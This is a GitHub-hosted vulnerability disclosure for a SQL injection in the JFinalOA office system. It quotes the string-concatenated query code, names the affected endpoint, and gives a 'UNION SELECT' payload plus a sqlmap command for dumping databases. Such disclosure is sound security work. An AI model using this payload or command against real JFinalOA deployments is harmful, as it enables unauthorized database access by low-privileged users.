Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
VulReq/JFinalOA
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
37 lines (29 sloc)
2.22 KB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #JFinalOA: | |
| #sql injection | |
| The vulnerability was discovered by downloading the program's source code to local and online deployment tests. | |
| Location: | |
| src/main/java/com/pointlion/mvc/admin/oa/workflow/WorkFlowService.java | |
| Code: | |
| String sql = "FROM "+tableName+" o, ( SELECT DISTINCT p.BUSINESS_KEY_, d.ID_ defid FROM act_hi_taskinst t, act_hi_procinst p, act_re_procdef d WHERE t.ASSIGNEE_='"+username+"' AND p.PROC_DEF_ID_ = d.ID_ AND d.KEY_ = '"+defkey+"' AND t.END_TIME_ is not NULL AND t.PROC_INST_ID_ = p.ID_) tt WHERE tt.BUSINESS_KEY_ = o.id "; | |
| // String sql = " from "+tableName+" o , (select BUSINESS_KEY_,d.ID_ defid from act_hi_identitylink i,act_hi_procinst p,act_re_procdef d where i.TYPE_='participant' and p.ID_=i.PROC_INST_ID_ and p.PROC_DEF_ID_=d.ID_ and d.KEY_='"+defkey+"' and i.USER_ID_='"+username+"') tt where tt.BUSINESS_KEY_=o.id"; | |
| if(StrKit.notBlank(sqlEXT)){ | |
| sql = sql + sqlEXT; | |
| } | |
| sql = sql +" order by o.create_time desc"; | |
| return Db.paginate(pnum, psize, " select o.*,defid ", sql); | |
| Rows:409 | |
| Harm: | |
| The attacker only needs an ordinary user to trigger the vulnerability and use the SQL injection vulnerability to obtain database information. | |
| Conditions for Execution: | |
| There is an unauthorized vulnerability in the getHaveDoneTaskDataList method of FlowTaskController. In this method, only the login status is obtained, and the user is not authenticated. Therefore, the unauthorized vulnerability can be used in combination. Although it is a background function, this injection can be used by ordinary users. | |
| Edition: | |
| Version = all | |
| Cause the cause : | |
| Use the splicing method to splice the parameter'"+defkey+"' in the sql query statement, and then bring the sql statement into the database for execution, and the vulnerability is triggered. | |
| POC: | |
| According to the framework routing configuration combined with the controller method to construct the url | |
| /admin/oa/workflow/flowtask/getHaveDoneTaskDataList?pageNumber=&pageSize=&defkey= | |
| Payload: | |
| 1' UNION SELECT 1,2,3 --+ | |
| Taking into account the need to log in, so use burpsuite to capture the package and save it to txt and then use sqlmap to test | |
| sqlmap.py -r D:\test.txt --random-agent --dbs --current-db |